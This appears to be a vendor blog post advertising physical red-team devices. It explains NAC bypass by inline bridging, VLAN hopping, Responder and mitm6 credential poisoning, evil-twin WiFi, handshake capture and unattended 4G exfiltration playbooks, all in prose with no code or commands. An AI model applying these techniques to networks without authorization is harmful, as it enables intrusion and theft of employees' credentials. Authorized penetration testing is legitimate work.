NAC Bypass, Evil Twin, and Credential Harvesting: Automating Physical Pentests
MAY 2, 2026 - Written by Yves SoeteBlacksight LLC — purpose-built hardware for these techniques atred.blacksight.io
Physical penetration tests have traditionally been manual, high-touch operations. An operator walks into a building, plugs in hardware, runs tools from a laptop, and hopes their SSH tunnel holds for the next 48 hours. Modern red team hardware automates these techniques — NAC bypass, credential harvesting, evil twin WiFi, and passive recon — into a single device that runs unattended and exfiltrates over 4G.
Physical red team operations test the hardest security boundary to defend: the network perimeter when someone is already inside the building. Social engineering gets you through the door. What you do once you have physical access to the network determines the engagement's value.NAC bypass: getting on the network
Network Access Control (802.1X, MAB) is the first obstacle. Most enterprise networks require authentication before a device gets a VLAN assignment and IP address. An unauthenticated device lands on a quarantine VLAN or gets no connectivity at all.
The bypass technique is a transparent Layer-2 bridge. You unplug an authenticated device — a printer, a VoIP phone, a workstation — and insert a bridging device inline between it and the switch port. The bridge forwards all traffic transparently, inheriting the authenticated session from the legitimate device. The switch sees no change in MAC address or 802.1X state.
This requires two Ethernet ports and the ability to operate as a transparent bridge at wire speed. Consumer hardware and Raspberry Pis cannot do this reliably. The Blacksight Phantom has dual 2.5GbE ports specifically for this purpose — plug it inline, and Tap mode handles the bridge automatically.
Once on the network, VLAN hopping via DTP negotiation and 802.1Q double-tagging can extend access beyond the initial VLAN. Both are automated in Tap mode.
Credential harvesting: Responder and beyond
With network access established, the next step is credential collection. Responder remains the most effective tool for this on Windows-dominated networks. It poisons LLMNR, NBT-NS, and mDNS responses to redirect authentication requests to the attacker's machine, capturing NTLMv2 hashes that can be cracked offline or relayed to other services.
The manual version requires an operator to be physically present or have a stable remote connection to manage Responder, monitor captures, and adjust settings. The automated version — Venom mode on the Phantom — starts Responder on boot, captures hashes continuously, and exfiltrates them to the dashboard over 4G in near-real-time.
Beyond Responder, Venom mode includes IPv6 WPAD/DNS takeover via mitm6 (effective even on networks that have disabled LLMNR), ARP cache poisoning for targeted MitM, and rogue DHCP for network-wide interception. These can run simultaneously or be scheduled for specific time windows to blend with normal business traffic.
Evil twin WiFi: attacking the wireless perimeter
Siren mode clones legitimate WiFi SSIDs to create evil twin access points. Employees and visitors connect to what appears to be the corporate WiFi but is actually controlled by the Phantom. Traffic flows through the device, allowing credential capture via captive portals, HTTPS interception where certificate pinning is absent, and passive monitoring of all wireless activity.
WPA/WPA2 handshake capture runs in parallel — the device captures the 4-way handshake from legitimate associations and pushes them to the dashboard for offline cracking. PMKID capture (clientless, no deauthentication required) provides a quieter alternative that works without disrupting any existing connections.
Traditional evil twin setups require a dedicated laptop, an external WiFi adapter, hostapd configuration, dnsmasq, iptables rules, and constant monitoring. Siren mode reduces this to a toggle in the web panel.
Passive recon: what Scope mode captures
Not every engagement starts loud. Scope mode provides passive-only reconnaissance — zero packets sent on the target network. Full packet capture to an encrypted partition, network asset discovery via traffic analysis, WiFi enumeration (SSIDs, channels, encryption, signal strength, hidden networks), and Bluetooth/BLE device enumeration and tracking.
Stealth mode is a master toggle that restricts the device to passive operation only. When stealth is active, no attack modes can run — the device listens without transmitting. This is critical for the first phase of an engagement when the operator needs to map the environment before deciding which attacks to run.
Scope can also run alongside active modes. While Venom is harvesting credentials on the wired network, Scope is silently mapping the entire wireless and Bluetooth landscape — building a complete picture of the target environment without sending any additional packets.
Automated playbooks: set and forget
The Phantom supports chained attack sequences. Define a playbook: run Scope for 30 minutes to map the network, automatically enable Venom for credential harvesting, exfiltrate captured hashes every hour, and switch to Siren mode after business hours when employees connect to WiFi from the parking lot.
Scheduled operations add time windows to each mode. Run Venom only during business hours (08:00-18:00) when LLMNR traffic is heaviest. Run Siren during lunch hours when employees are on mobile devices. Run Scope 24/7 for continuous monitoring.
This removes the operator from the loop entirely during the deployment phase. Plant the device, activate the playbook, and collect results from the dashboard. Return to the site only to retrieve the hardware — or trigger self-destruct remotely and walk away.
The Scout: when you only need recon
Not every engagement requires a full attack platform. The Blacksight Scout ($499) is a compact recon stick that does one thing well: wireless intelligence. It enumerates every WiFi network, Bluetooth device, client, and probe request in range. Plug it into a USB-C power source, attach a USB 4G dongle, and it phones home automatically.
Deploy Scouts at target locations days before the main engagement. Build a complete wireless landscape map — which SSIDs exist, what encryption they use, how many clients connect, what devices are probing for networks they remember. This intelligence directly informs which attack modes to run on the Phantom when you deploy it.
Both devices are available at red.blacksight.io. No subscriptions — the dashboard, relay, and all features are included with the hardware.